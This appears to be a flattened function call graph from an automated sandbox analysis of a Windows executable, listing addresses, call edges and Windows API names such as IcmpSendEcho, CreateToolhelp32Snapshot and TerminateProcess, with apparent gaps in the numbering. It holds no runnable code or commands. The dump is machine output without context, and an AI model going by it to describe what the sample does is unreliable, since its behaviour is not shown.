Mailbox 98259->98516 98261 7ae19d 98261->98261 98263 7ae691 98528 7da48d 89 API calls 4 library calls 98263->98528 98264 7af165 98536 7da48d 89 API calls 4 library calls 98264->98536 98266 7769fa 98277 781c9c 59 API calls 98266->98277 98269->98239 98269->98254 98273 7ae2e9 VariantClear 98269->98273 98269->98285 98326 77cfd7 98269->98326 98345 7ee60c 98269->98345 98348 7dd6be 98269->98348 98393 7d412a 98269->98393 98396 7ef1b2 98269->98396 98401 7e5e1d 98269->98401 98426 77d679 98269->98426 98466 7d413a 98269->98466 98511 775190 59 API calls Mailbox 98269->98511 98527 7c7aad 59 API calls 98269->98527 98270 781c9c 59 API calls 98270->98286 98271 790fe6 59 API calls Mailbox 98271->98286 98272 7ae6a0 98273->98269 98274 7aea9a 98280 781c9c 59 API calls 98274->98280 98275 
7769ff 98275->98263 98275->98264 98277->98285 98278 781207 59 API calls 98278->98286 98280->98285 98281 792f70 67 API calls __cinit 98281->98286 98282 7aeb67 98282->98285 98529 7c7aad 59 API calls 98282->98529 98283 7c7aad 59 API calls 98283->98286 98286->98263 98286->98266 98286->98270 98286->98271 98286->98274 98286->98275 98286->98278 98286->98281 98286->98282 98286->98283 98286->98285 98287 7aef28 98286->98287 98289 775a1a 98286->98289 98509 777e50 299 API calls 2 library calls 98286->98509 98510 776e30 60 API calls Mailbox 98286->98510 98530 7da48d 89 API calls 4 library calls 98287->98530 98535 7da48d 89 API calls 4 library calls 98289->98535 98299 7753cf 98298->98299 98323 7753fd Mailbox 98298->98323 98300 790fe6 Mailbox 59 API calls 98299->98300 98300->98323 98301 7769fa 98302 781c9c 59 API calls 98301->98302 98321 775569 Mailbox 98302->98321 98303 7769ff 98305 7ae691 98303->98305 98306 7af165 98303->98306 98304 790fe6 59 API calls Mailbox 98304->98323 98539 7da48d 89 API calls 4 library calls 98305->98539 98543 7da48d 89 API calls 4 library calls 98306->98543 98307 781207 59 API calls 98307->98323 98311 781c9c 59 API calls 98311->98323 98312 775a1a 98542 7da48d 89 API calls 4 library calls 98312->98542 98313 7ae6a0 98313->98252 98314 792f70 67 API calls __cinit 98314->98323 98315 7aea9a 98318 781c9c 59 API calls 98315->98318 98318->98321 98319 7aeb67 98319->98321 98540 7c7aad 59 API calls 98319->98540 98320 7c7aad 59 API calls 98320->98323 98321->98252 98323->98301 98323->98303 98323->98304 98323->98305 98323->98307 98323->98311 98323->98312 98323->98314 98323->98315 98323->98319 98323->98320 98323->98321 98324 7aef28 98323->98324 98537 777e50 299 API calls 2 library calls 98323->98537 98538 776e30 60 API calls Mailbox 98323->98538 98541 7da48d 89 API calls 4 library calls 98324->98541 98544 774d37 98326->98544 98330 77d018 98331 77d57b 98330->98331 98335 77d439 Mailbox __wsetenvp 98330->98335 98592 77502b 98330->98592 98331->98269 98334 790c65 62 API 
calls 98334->98335 98335->98331 98335->98334 98337 774f98 59 API calls 98335->98337 98340 774d37 84 API calls 98335->98340 98341 781821 59 API calls 98335->98341 98344 77502b 59 API calls 98335->98344 98567 79312d 98335->98567 98577 7859d3 98335->98577 98588 785ac3 98335->98588 98596 78162d 98335->98596 98601 78153b 59 API calls 2 library calls 98335->98601 98602 774f3c 59 API calls Mailbox 98335->98602 98337->98335 98340->98335 98341->98335 98344->98335 98674 7ed1c6 98345->98674 98347 7ee61c 98347->98269 98349 7dd6dd 98348->98349 98350 7dd6e8 98348->98350 98352 77502b 59 API calls 98349->98352 98351 7dd7c2 Mailbox 98350->98351 98354 781207 59 API calls 98350->98354 98353 790fe6 Mailbox 59 API calls 98351->98353 98390 7dd7cb Mailbox 98351->98390 98352->98350 98355 7dd80b 98353->98355 98356 7dd70c 98354->98356 98357 7dd817 98355->98357 98879 783df7 60 API calls Mailbox 98355->98879 98358 781207 59 API calls 98356->98358 98360 774d37 84 API calls 98357->98360 98361 7dd715 98358->98361 98362 7dd82f 98360->98362 98363 774d37 84 API calls 98361->98363 98805 783e47 98362->98805 98365 7dd721 98363->98365 98816 790119 98365->98816 98368 7dd876 98373 7dd8d8 98368->98373 98374 7dd8a1 98368->98374 98369 7dd842 GetLastError 98371 7dd85b 98369->98371 98370 7dd736 98372 7817e0 59 API calls 98370->98372 98371->98390 98880 783f0b CloseHandle 98371->98880 98375 7dd769 98372->98375 98377 790fe6 Mailbox 59 API calls 98373->98377 98376 790fe6 Mailbox 59 API calls 98374->98376 98382 7d412a 3 API calls 98375->98382 98392 7dd793 Mailbox 98375->98392 98379 7dd8a6 98376->98379 98378 7dd8dd 98377->98378 98385 781207 59 API calls 98378->98385 98378->98390 98383 7dd8b7 98379->98383 98386 781207 59 API calls 98379->98386 98381 77502b 59 API calls 98381->98351 98384 7dd779 98382->98384 98881 7dfc0d 59 API calls 2 library calls 98383->98881 98387 781a36 59 API calls 98384->98387 98384->98392 98385->98390 98386->98383 98389 7dd78a 98387->98389 98867 7d3f1d 98389->98867 98390->98269 98392->98381 
98929 7d494a GetFileAttributesW 98393->98929 98397 774d37 84 API calls 98396->98397 98398 7ef1cf 98397->98398 98933 7d4148 CreateToolhelp32Snapshot Process32FirstW 98398->98933 98400 7ef1de 98400->98269 98402 7e5e46 98401->98402 98403 7e5e74 WSAStartup 98402->98403 98404 77502b 59 API calls 98402->98404 98405 7e5e9d 98403->98405 98415 7e5e88 Mailbox 98403->98415 98406 7e5e61 98404->98406 98954 7840cd 98405->98954 98406->98403 98410 77502b 59 API calls 98406->98410 98409 774d37 84 API calls 98411 7e5eb2 98409->98411 98412 7e5e70 98410->98412 98959 78402a WideCharToMultiByte 98411->98959 98412->98403 98414 7e5ebf inet_addr gethostbyname 98414->98415 98416 7e5edd IcmpCreateFile 98414->98416 98415->98269 98416->98415 98417 7e5f01 98416->98417 98418 790fe6 Mailbox 59 API calls 98417->98418 98419 7e5f1a 98418->98419 98967 78433f 98419->98967 98422 7e5f34 IcmpSendEcho 98424 7e5f6d 98422->98424 98423 7e5f55 IcmpSendEcho 98423->98424 98425 7e5fd4 IcmpCloseHandle WSACleanup 98424->98425 98425->98415 98972 774f98 98426->98972 98430 790fe6 Mailbox 59 API calls 98431 77d6aa 98430->98431 98434 77d6ba 98431->98434 99002 783df7 60 API calls Mailbox 98431->99002 98432 7b5068 98433 77d6df 98432->98433 99007 7dfbb7 59 API calls 98432->99007 98437 77502b 59 API calls 98433->98437 98443 77d6ec 98433->98443 98436 774d37 84 API calls 98434->98436 98438 77d6c8 98436->98438 98440 7b50b0 98437->98440 98439 783e47 67 API calls 98438->98439 98441 77d6d7 98439->98441 98442 7b50b8 98440->98442 98440->98443 98441->98432 98441->98433 99006 783f0b CloseHandle 98441->99006 98445 77502b 59 API calls 98442->98445 98985 7841d6 98443->98985 98447 77d6f3 98445->98447 98448 7b50ca 98447->98448 98449 77d70d 98447->98449 98451 790fe6 Mailbox 59 API calls 98448->98451 98450 781207 59 API calls 98449->98450 98453 77d715 98450->98453 98452 7b50d0 98451->98452 98454 7b50e4 98452->98454 98990 783ea1 98452->98990 99003 783b7b 65 API calls Mailbox 98453->99003 98459 7b50e8 _memmove 98454->98459 98993 7d7c7f 
98454->98993 98458 77d724 98458->98459 99004 774f3c 59 API calls Mailbox 98458->99004 98461 77d738 Mailbox 98462 77d772 98461->98462 98463 7842cf CloseHandle 98461->98463 98462->98269 98464 77d766 98463->98464 98464->98462 99005 783f0b CloseHandle 98464->99005 98467 7d494a 3 API calls 98466->98467 98468 7d413f 98467->98468 98468->98269 98470 7ec39a 98469->98470 98471 7ec380 98469->98471 99015 7ea8fd 98470->99015 99042 7da48d 89 API calls 4 library calls 98471->99042 98475 7753b0 298 API calls 98476 7ec406 98475->98476 98477 7ec392 Mailbox 98476->98477 98478 7ec498 98476->98478 98482 7ec447 98476->98482 98477->98252 98479 7ec4ee 98478->98479 98480 7ec49e 98478->98480 98479->98477 98481 774d37 84 API calls 98479->98481 99043 7d7ed5 59 API calls 98480->99043 98483 7ec500 98481->98483 98485 7d789a 59 API calls 98482->98485 98486 781aa4 59 API calls 98483->98486 98488 7ec477 98485->98488 98489 7ec524 CharUpperBuffW 98486->98489 98487 7ec4c1 99044 7835b9 59 API calls Mailbox 98487->99044 98491 7c6ebc 298 API calls 98488->98491 98493 7ec53e 98489->98493 98491->98477 98492 7ec4c9 Mailbox 99045 77b020 98492->99045 98494 7ec591 98493->98494 98497 7ec545 98493->98497 98496 774d37 84 API calls 98494->98496 98498 7ec599 98496->98498 99022 7d789a 98497->99022 99087 775376 60 API calls 98498->99087 98503 7ec5a3 98503->98477 98504 774d37 84 API calls 98503->98504 98505 7ec5be 98504->98505 99088 7835b9 59 API calls Mailbox 98505->99088 98507 7ec5ce 98508 77b020 298 API calls 98507->98508 98508->98477 98509->98286 98510->98286 98511->98269 98512->98252 98513->98254 98514->98246 98515->98259 98516->98261 98518 781caf 98517->98518 98519 781ca7 98517->98519 98518->98252 99627 781bcc 59 API calls 2 library calls 98519->99627 98521->98252 98523 781a45 __wsetenvp _memmove 98522->98523 98524 790fe6 Mailbox 59 API calls 98523->98524 98525 781a83 98524->98525 98525->98252 98526->98252 98527->98269 98528->98272 98529->98285 98530->98289 98531->98239 98532->98285 98533->98239 98534->98239 
98535->98285 98536->98285 98537->98323 98538->98323 98539->98313 98540->98321 98541->98312 98542->98321 98543->98321 98545 774d51 98544->98545 98546 774d4b 98544->98546 98547 7adb28 __i64tow 98545->98547 98548 774d99 98545->98548 98550 774d57 __itow 98545->98550 98553 7ada2f 98545->98553 98562 775278 98546->98562 98603 7938c8 83 API calls 3 library calls 98548->98603 98552 790fe6 Mailbox 59 API calls 98550->98552 98554 774d71 98552->98554 98555 790fe6 Mailbox 59 API calls 98553->98555 98560 7adaa7 Mailbox _wcscpy 98553->98560 98554->98546 98556 781a36 59 API calls 98554->98556 98557 7ada74 98555->98557 98556->98546 98558 790fe6 Mailbox 59 API calls 98557->98558 98559 7ada9a 98558->98559 98559->98560 98561 781a36 59 API calls 98559->98561 98604 7938c8 83 API calls 3 library calls 98560->98604 98561->98560 98563 790fe6 Mailbox 59 API calls 98562->98563 98564 775285 98563->98564 98565 775294 98564->98565 98566 781a36 59 API calls 98564->98566 98565->98330 98566->98565 98568 793139 98567->98568 98569 7931ae 98567->98569 98576 79315e 98568->98576 98605 798d58 58 API calls __getptd_noexit 98568->98605 98607 7931c0 60 API calls 3 library calls 98569->98607 98572 7931bb 98572->98335 98573 793145 98606 798fe6 9 API calls __controlfp_s 98573->98606 98575 793150 98575->98335 98576->98335 98578 7859fe _memset 98577->98578 98608 785800 98578->98608 98582 785ab9 Shell_NotifyIconW 98584 785aab 98582->98584 98583 785a9d Shell_NotifyIconW 98583->98584 98612 7856f8 98584->98612 98586 785a83 98586->98582 98586->98583 98587 785ab2 98587->98335 98589 785b25 98588->98589 98590 785ad5 _memset 98588->98590 98589->98335 98591 785af4 Shell_NotifyIconW 98590->98591 98591->98589 98593 775041 98592->98593 98594 77503c 98592->98594 98593->98335 98594->98593 98673 7937ba 59 API calls 98594->98673 98597 790fe6 Mailbox 59 API calls 98596->98597 98598 781652 98597->98598 98599 790fe6 Mailbox 59 API calls 98598->98599 98600 781660 98599->98600 98600->98335 98601->98335 98602->98335 98603->98550 
98604->98547 98605->98573 98606->98575 98607->98572 98609 78581c 98608->98609 98610 785810 98608->98610 98609->98610 98611 785821 DestroyIcon 98609->98611 98610->98586 98642 7d34dd 62 API calls _W_store_winword 98610->98642 98611->98610 98613 785715 98612->98613 98634 7857fa Mailbox 98612->98634 98614 78162d 59 API calls 98613->98614 98615 785723 98614->98615 98616 7c0c4c LoadStringW 98615->98616 98617 785730 98615->98617 98620 7c0c66 98616->98620 98618 781821 59 API calls 98617->98618 98619 785745 98618->98619 98621 785752 98619->98621 98627 7c0c74 98619->98627 98622 781c9c 59 API calls 98620->98622 98621->98620 98623 785760 98621->98623 98630 785778 _memset _wcscpy 98622->98630 98643 781900 98623->98643 98628 7c0cb7 Mailbox 98627->98628 98629 781207 59 API calls 98627->98629 98627->98630 98660 7938c8 83 API calls 3 library calls 98628->98660 98631 7c0c9e 98629->98631 98632 7857e0 Shell_NotifyIconW 98630->98632 98659 7d0252 60 API calls Mailbox 98631->98659 98632->98634 98634->98587 98636 7c0cd6 98638 781900 59 API calls 98636->98638 98637 7c0ca9 98639 7817e0 59 API calls 98637->98639 98640 7c0ce7 98638->98640 98639->98628 98641 781900 59 API calls 98640->98641 98641->98630 98642->98586 98644 781914 98643->98644 98645 7bf534 98643->98645 98661 7818a5 98644->98661 98647 781c7e 59 API calls 98645->98647 98649 7bf53f __wsetenvp _memmove 98647->98649 98648 78191f 98650 7817e0 98648->98650 98651 7bf401 98650->98651 98652 7817f2 98650->98652 98672 7c87f9 59 API calls _memmove 98651->98672 98666 781680 98652->98666 98655 7817fe 98655->98630 98656 7bf40b 98657 781c9c 59 API calls 98656->98657 98658 7bf413 Mailbox 98657->98658 98659->98637 98660->98636 98662 7818b4 __wsetenvp 98661->98662 98663 781c7e 59 API calls 98662->98663 98664 7818c5 _memmove 98662->98664 98665 7bf4f1 _memmove 98663->98665 98664->98648 98667 781692 98666->98667 98670 7816ba _memmove 98666->98670 98668 790fe6 Mailbox 59 API calls 98667->98668 98667->98670 98671 78176f _memmove 98668->98671 98669 
790fe6 Mailbox 59 API calls 98669->98671 98670->98655 98671->98669 98672->98656 98673->98593 98675 774d37 84 API calls 98674->98675 98676 7ed203 98675->98676 98681 7ed24a Mailbox 98676->98681 98712 7ede8e 98676->98712 98678 7ed29b Mailbox 98678->98681 98685 774d37 84 API calls 98678->98685 98699 7ed4a2 98678->98699 98745 7dfc0d 59 API calls 2 library calls 98678->98745 98746 7ed6c8 61 API calls 2 library calls 98678->98746 98679 7ed617 98763 7edfb1 92 API calls Mailbox 98679->98763 98681->98347 98683 7ed626 98684 7ed4b0 98683->98684 98686 7ed632 98683->98686 98725 7ed057 98684->98725 98685->98678 98686->98681 98691 7ed4e9 98740 790e38 98691->98740 98694 7ed51c 98748 7747be 98694->98748 98695 7ed503 98747 7da48d 89 API calls 4 library calls 98695->98747 98698 7ed50e GetCurrentProcess TerminateProcess 98698->98694 98699->98679 98699->98684 98704 7ed68d 98704->98681 98707 7ed6a1 FreeLibrary 98704->98707 98705 7ed554 98760 7edd32 107 API calls _free 98705->98760 98707->98681 98711 7ed565 98711->98704 98761 774230 59 API calls Mailbox 98711->98761 98762 77523c 59 API calls 98711->98762 98764 7edd32 107 API calls _free 98711->98764 98713 781aa4 59 API calls 98712->98713 98714 7edea9 CharLowerBuffW 98713->98714 98765 7cf903 98714->98765 98718 781207 59 API calls 98719 7edee2 98718->98719 98772 781462 98719->98772 98721 7edef9 98722 781981 59 API calls 98721->98722 98724 7edf05 Mailbox 98722->98724 98723 7edf41 Mailbox 98723->98678 98724->98723 98785 7ed6c8 61 API calls 2 library calls 98724->98785 98726 7ed072 98725->98726 98730 7ed0c7 98725->98730 98727 790fe6 Mailbox 59 API calls 98726->98727 98728 7ed094 98727->98728 98729 790fe6 Mailbox 59 API calls 98728->98729 98728->98730 98729->98728 98731 7ee139 98730->98731 98732 7ee362 Mailbox 98731->98732 98739 7ee15c _strcat _wcscpy __wsetenvp 98731->98739 98732->98691 98733 77502b 59 API calls 98733->98739 98734 775087 59 API calls 98734->98739 98735 7750d5 59 API calls 98735->98739 98736 774d37 84 API calls 98736->98739 
98737 79593c 58 API calls __crtGetStringTypeA_stat 98737->98739 98739->98732 98739->98733 98739->98734 98739->98735 98739->98736 98739->98737 98794 7d5e42 61 API calls 2 library calls 98739->98794 98741 790e4d 98740->98741 98742 790ee5 Sleep 98741->98742 98743 790ed3 CloseHandle 98741->98743 98744 790eb3 98741->98744 98742->98744 98743->98744 98744->98694 98744->98695 98745->98678 98746->98678 98747->98698 98749 7747c6 98748->98749 98750 790fe6 Mailbox 59 API calls 98749->98750 98751 7747d4 98750->98751 98752 7747e0 98751->98752 98795 7746ec 59 API calls Mailbox 98751->98795 98754 774540 98752->98754 98796 774650 98754->98796 98756 77454f 98757 790fe6 Mailbox 59 API calls 98756->98757 98758 7745eb 98756->98758 98757->98758 98758->98711 98759 774230 59 API calls Mailbox 98758->98759 98759->98705 98760->98711 98761->98711 98762->98711 98763->98683 98764->98711 98766 7cf92e __wsetenvp 98765->98766 98767 7cf963 98766->98767 98768 7cf96d 98766->98768 98771 7cfa14 98766->98771 98767->98768 98786 7814db 98767->98786 98768->98718 98768->98724 98770 7814db 61 API calls 98770->98771 98771->98768 98771->98770 98773 7814ce 98772->98773 98774 781471 98772->98774 98775 781981 59 API calls 98773->98775 98774->98773 98776 78147c 98774->98776 98777 78149f _memmove 98775->98777 98778 7bf1de 98776->98778 98779 781497 98776->98779 98777->98721 98781 781c7e 59 API calls 98778->98781 98793 781b7c 59 API calls Mailbox 98779->98793 98782 7bf1e8 98781->98782 98783 790fe6 Mailbox 59 API calls 98782->98783 98784 7bf208 98783->98784 98785->98723 98787 7814e9 CompareStringW 98786->98787 98792 7bf210 98786->98792 98790 78150c 98787->98790 98789 7bf25f 98790->98767 98791 794eb8 60 API calls 98791->98792 98792->98789 98792->98791 98793->98777 98794->98739 98795->98752 98797 774659 Mailbox 98796->98797 98798 7ad6ec 98797->98798 98803 774663 98797->98803 98799 790fe6 Mailbox 59 API calls 98798->98799 98801 7ad6f8 98799->98801 98800 77466a 98800->98756 98803->98800 98804 775190 59 API calls Mailbox 
100151->100139 100152->100142 100155 774540 59 API calls 100153->100155 100156 7855bc 59 API calls 100154->100156 100157 785038 100155->100157 100158 7c0b0b 100156->100158 100230 7743d0 100157->100230 100158->100158 100160 77477a 59 API calls 100162 785055 100160->100162 100161 7743d0 59 API calls 100161->100162 100162->100160 100162->100161 100163 7855bc 59 API calls 100162->100163 100164 78509b Mailbox 100162->100164 100163->100162 100164->100047 100166 7831cc __write_nolock 100165->100166 100167 7c0314 _memset 100166->100167 100168 7831e5 100166->100168 100170 7c0330 GetOpenFileNameW 100167->100170 100169 790284 60 API calls 100168->100169 100171 7831ee 100169->100171 100172 7c037f 100170->100172 100241 7909c5 100171->100241 100174 781821 59 API calls 100172->100174 100176 7c0394 100174->100176 100176->100176 100178 783203 100259 78278a 100178->100259 100205->100054 100208 78542d __write_nolock 100207->100208 100209 781821 59 API calls 100208->100209 100215 785590 Mailbox 100208->100215 100211 78545f 100209->100211 100210 781609 59 API calls 100210->100211 100211->100210 100220 785495 Mailbox 100211->100220 100212 781609 59 API calls 100212->100220 100213 785563 100214 781a36 59 API calls 100213->100214 100213->100215 100216 785584 100214->100216 100215->100101 100218 784c94 59 API calls 100216->100218 100217 781a36 59 API calls 100217->100220 100218->100215 100219 784c94 59 API calls 100219->100220 100220->100212 100220->100213 100220->100215 100220->100217 100220->100219 100222 790fe6 Mailbox 59 API calls 100221->100222 100223 774787 100222->100223 100223->100108 100225 7855df 100224->100225 100226 7855c6 100224->100226 100227 781821 59 API calls 100225->100227 100228 781c9c 59 API calls 100226->100228 100229 784fa0 100227->100229 100228->100229 100229->100120 100231 7ad6c9 100230->100231 100235 7743e7 100230->100235 100231->100235 100240 7740cb 59 API calls Mailbox 100231->100240 100233 774530 100239 77523c 59 API calls 100233->100239 100234 7744e8 100236 
790fe6 Mailbox 59 API calls 100234->100236 100235->100233 100235->100234 100238 7744ef 100235->100238 100236->100238 100238->100162 100239->100238 100240->100235 100242 7a1b70 __write_nolock 100241->100242 100243 7909d2 GetLongPathNameW 100242->100243 100244 781821 59 API calls 100243->100244 100245 7831f7 100244->100245 100246 782f3d 100245->100246 100247 781207 59 API calls 100246->100247 100248 782f4f 100247->100248 100249 790284 60 API calls 100248->100249 100250 782f5a 100249->100250 100251 782f65 100250->100251 100256 7c0177 100250->100256 100252 784c94 59 API calls 100251->100252 100254 782f71 100252->100254 100253 78151f 61 API calls 100253->100256 100293 771307 100254->100293 100256->100253 100257 7c0191 100256->100257 100258 782f84 Mailbox 100258->100178 100299 7849c2 100259->100299 100294 771319 100293->100294 100298 771338 _memmove 100293->100298 100297 790fe6 Mailbox 59 API calls 100294->100297 100295 790fe6 Mailbox 59 API calls 100296 77134f 100295->100296 100296->100258 100297->100298 100298->100295 100483 784b29 100299->100483 100304 7849ed LoadLibraryExW 100493 784ade 100304->100493 100305 7c08bb 100307 784a2f 84 API calls 100305->100307 100309 7c08c2 100307->100309 100311 784ade 3 API calls 100309->100311 100314 7c08ca 100311->100314 100312 784a14 100313 784a20 100312->100313 100312->100314 100316 784a2f 84 API calls 100313->100316 100519 784ab2 100314->100519 100532 784b77 100483->100532 100486 784b50 100487 7849d4 100486->100487 100488 784b60 FreeLibrary 100486->100488 100490 79547b 100487->100490 100488->100487 100489 784b77 2 API calls 100489->100486 100536 795490 100490->100536 100492 7849e1 100492->100304 100492->100305 100617 784baa 100493->100617 100496 784a05 100500 7848b0 100496->100500 100497 784b15 FreeLibrary 100497->100496 100498 784baa 2 API calls 100499 784b03 100498->100499 100499->100496 100499->100497 100501 790fe6 Mailbox 59 API calls 100500->100501 100502 7848c5 100501->100502 100503 78433f 59 API calls 100502->100503 100504 
7848d1 _memmove 100503->100504 100505 78490c 100504->100505 100507 7c080a 100504->100507 100508 784a6e 69 API calls 100505->100508 100506 7c0817 100627 7d9f5e 95 API calls 100506->100627 100507->100506 100626 7d9ed8 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 100507->100626 100518 784915 100508->100518 100511 784ab2 74 API calls 100511->100518 100512 7c0859 100621 784a8c 100512->100621 100516 7849a0 100516->100312 100517 784a8c 85 API calls 100517->100518 100518->100511 100518->100512 100518->100516 100518->100517 100520 7c0945 100519->100520 100521 784ac4 100519->100521 100733 795802 100521->100733 100524 7d96c4 100858 7d951a 100524->100858 100526 7d96da 100533 784b44 100532->100533 100534 784b80 LoadLibraryA 100532->100534 100533->100486 100533->100489 100534->100533 100535 784b91 GetProcAddress 100534->100535 100535->100533 100537 79549c __freefls@4 100536->100537 100538 7954af 100537->100538 100541 7954e0 100537->100541 100585 798d58 58 API calls __getptd_noexit 100538->100585 100540 7954b4 100586 798fe6 9 API calls __controlfp_s 100540->100586 100555 7a0718 100541->100555 100544 7954e5 100545 7954fb 100544->100545 100546 7954ee 100544->100546 100548 795525 100545->100548 100549 795505 100545->100549 100587 798d58 58 API calls __getptd_noexit 100546->100587 100570 7a0837 100548->100570 100588 798d58 58 API calls __getptd_noexit 100549->100588 100552 7954bf @_EH4_CallFilterFunc@8 __freefls@4 100552->100492 100556 7a0724 __freefls@4 100555->100556 100557 799e3b __lock 58 API calls 100556->100557 100568 7a0732 100557->100568 100558 7a07a6 100590 7a082e 100558->100590 100559 7a07ad 100595 798a4d 58 API calls 2 library calls 100559->100595 100562 7a07b4 100562->100558 100596 79a05b InitializeCriticalSectionAndSpinCount 100562->100596 100563 7a0823 __freefls@4 100563->100544 100565 799ec3 __mtinitlocknum 58 API calls 100565->100568 100567 7a07da EnterCriticalSection 100567->100558 100568->100558 100568->100559 100568->100565 100593 
796e7d 59 API calls __lock 100568->100593 100594 796ee7 LeaveCriticalSection LeaveCriticalSection _doexit 100568->100594 100571 7a0857 __wopenfile 100570->100571 100572 7a0871 100571->100572 100584 7a0a2c 100571->100584 100603 7939fb 60 API calls 2 library calls 100571->100603 100601 798d58 58 API calls __getptd_noexit 100572->100601 100574 7a0876 100602 798fe6 9 API calls __controlfp_s 100574->100602 100576 795530 100589 795552 LeaveCriticalSection LeaveCriticalSection __wfsopen 100576->100589 100577 7a0a8f 100598 7a87d1 100577->100598 100580 7a0a25 100580->100584 100604 7939fb 60 API calls 2 library calls 100580->100604 100582 7a0a44 100582->100584 100605 7939fb 60 API calls 2 library calls 100582->100605 100584->100572 100584->100577 100585->100540 100586->100552 100587->100552 100588->100552 100589->100552 100597 799fa5 LeaveCriticalSection 100590->100597 100592 7a0835 100592->100563 100593->100568 100594->100568 100595->100562 100596->100567 100597->100592 100606 7a7fb5 100598->100606 100601->100574 100602->100576 100603->100580 100604->100582 100605->100584 100608 7a7fc1 __freefls@4 100606->100608 100607 7a7fd7 100609 798d58 __controlfp_s 58 API calls 100607->100609 100608->100607 100610 7a800d 100608->100610 100611 7a7fdc 100609->100611 100612 7a807e __wsopen_nolock 109 API calls 100610->100612 100613 798fe6 __controlfp_s 9 API calls 100611->100613 100614 7a8029 100612->100614 100615 7a8052 __wsopen_helper LeaveCriticalSection 100614->100615 100618 784af7 100617->100618 100619 784bb3 LoadLibraryA 100617->100619 100618->100498 100618->100499 100619->100618 100620 784bc4 GetProcAddress 100619->100620 100620->100618 100622 784a9b 100621->100622 100623 7c0923 100621->100623 100628 795a6d 100622->100628 100626->100506 100627->100518 100736 79581d 100733->100736 100735 784ad5 100735->100524 100737 795829 __freefls@4 100736->100737 100738 79586c 100737->100738 100739 79583f _memset 100737->100739 100741 795864 __freefls@4 100737->100741 100740 796e3e __lock_file 59 
API calls 100738->100740 100763 798d58 58 API calls __getptd_noexit 100739->100763 100742 795872 100740->100742 100741->100735 100749 79563d 100742->100749 100745 795859 100764 798fe6 9 API calls __controlfp_s 100745->100764 100750 795673 100749->100750 100753 795658 _memset 100749->100753 100765 7958a6 LeaveCriticalSection LeaveCriticalSection __wfsopen 100750->100765 100751 795663 100854 798d58 58 API calls __getptd_noexit 100751->100854 100753->100750 100753->100751 100754 7956b3 100753->100754 100754->100750 100757 7957c4 _memset 100754->100757 100759 794906 __flsbuf 58 API calls 100754->100759 100766 7a108b 100754->100766 100834 7a0dd7 100754->100834 100856 7a0ef8 58 API calls 3 library calls 100754->100856 100857 798d58 58 API calls __getptd_noexit 100757->100857 100759->100754 100761 795668 100763->100745 100764->100741 100765->100741 100767 7a10ac 100766->100767 100768 7a10c3 100766->100768 100770 7a17fb 100768->100770 100835 7a0de2 100834->100835 100840 7a0df7 100834->100840 100854->100761 100856->100754 100857->100761 100861 79542a GetSystemTimeAsFileTime 100858->100861 100860 7d9529 100860->100526 100862 795458 __aulldiv 100861->100862 100862->100860 101039 779a6c 101042 77829c 101039->101042 101041 779a78 101043 778308 101042->101043 101044 7782b4 101042->101044 101048 778331 101043->101048 101052 7da48d 89 API calls 4 library calls 101043->101052 101044->101043 101045 7753b0 299 API calls 101044->101045 101049 7782eb 101045->101049 101047 7b0ed8 101047->101047 101048->101041 101049->101048 101051 77523c 59 API calls 101049->101051 101051->101043 101052->101047 101053 784d83 101054 784dba 101053->101054 101055 784dd8 101054->101055 101056 784e37 101054->101056 101092 784e35 101054->101092 101060 784ead PostQuitMessage 101055->101060 101061 784de5 101055->101061 101058 784e3d 101056->101058 101059 7c09c2 101056->101059 101057 784e1a DefWindowProcW 101095 784e28 101057->101095 101062 784e42 101058->101062 101063 784e65 SetTimer RegisterWindowMessageW 
101058->101063 101108 77c460 10 API calls Mailbox 101059->101108 101060->101095 101064 784df0 101061->101064 101065 7c0a35 101061->101065 101067 784e49 KillTimer 101062->101067 101068 7c0965 101062->101068 101069 784e8e CreatePopupMenu 101063->101069 101063->101095 101070 784df8 101064->101070 101071 784eb7 101064->101071 101111 7d2cce 97 API calls _memset 101065->101111 101077 785ac3 Shell_NotifyIconW 101067->101077 101075 7c099e MoveWindow 101068->101075 101076 7c096a 101068->101076 101069->101095 101078 7c0a1a 101070->101078 101079 784e03 101070->101079 101098 785b29 101071->101098 101073 7c09e9 101109 77c483 299 API calls Mailbox 101073->101109 101075->101095 101082 7c098d SetFocus 101076->101082 101083 7c096e 101076->101083 101084 784e5c 101077->101084 101078->101057 101110 7c8854 59 API calls Mailbox 101078->101110 101085 784e9b 101079->101085 101090 784e0e 101079->101090 101080 7c0a47 101080->101057 101080->101095 101082->101095 101086 7c0977 101083->101086 101083->101090 101105 7734e4 DeleteObject DestroyWindow Mailbox 101084->101105 101106 785bd7 107 API calls _memset 101085->101106 101107 77c460 10 API calls Mailbox 101086->101107 101090->101057 101094 785ac3 Shell_NotifyIconW 101090->101094 101092->101057 101093 784eab 101093->101095 101096 7c0a0e 101094->101096 101097 7859d3 94 API calls 101096->101097 101097->101092 101099 785b40 _memset 101098->101099 101100 785bc2 101098->101100 101101 7856f8 87 API calls 101099->101101 101100->101095 101104 785b67 101101->101104 101102 785bab KillTimer SetTimer 101102->101100 101103 7c0d6e Shell_NotifyIconW 101103->101102 101104->101102 101104->101103 101105->101095 101106->101093 101107->101095 101108->101073 101109->101090 101110->101092 101111->101080 101112 779a88 101115 7786e0 101112->101115 101116 7786fd 101115->101116 101117 7b0ff8 101116->101117 101118 7b0fad 101116->101118 101139 778724 101116->101139 101150 7eaad0 299 API calls __cinit 101117->101150 101121 7b0fb5 101118->101121 101124 7b0fc2 
101118->101124 101118->101139 101119 775278 59 API calls 101119->101139 101148 7eb0e4 299 API calls 101121->101148 101123 792f70 __cinit 67 API calls 101123->101139 101140 77898d 101124->101140 101149 7eb58c 299 API calls 3 library calls 101124->101149 101126 7b1289 101126->101126 101128 773f42 68 API calls 101128->101139 101129 7b11af 101153 7eae3b 89 API calls 101129->101153 101132 778a17 101133 7739be 68 API calls 101133->101139 101138 773c30 68 API calls 101138->101139 101139->101119 101139->101123 101139->101128 101139->101129 101139->101132 101139->101133 101139->101138 101139->101140 101141 7753b0 299 API calls 101139->101141 101142 781c9c 59 API calls 101139->101142 101144 773938 68 API calls 101139->101144 101145 77855e 299 API calls 101139->101145 101146 7784e2 89 API calls 101139->101146 101147 77835f 299 API calls 101139->101147 101151 77523c 59 API calls 101139->101151 101152 7c73ab 59 API calls 101139->101152 101140->101132 101154 7da48d 89 API calls 4 library calls 101140->101154 101141->101139 101142->101139 101144->101139 101145->101139 101146->101139 101147->101139 101148->101124 101149->101140 101150->101139 101151->101139 101152->101139 101153->101140 101154->101126
                                                APIs
                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0078526C
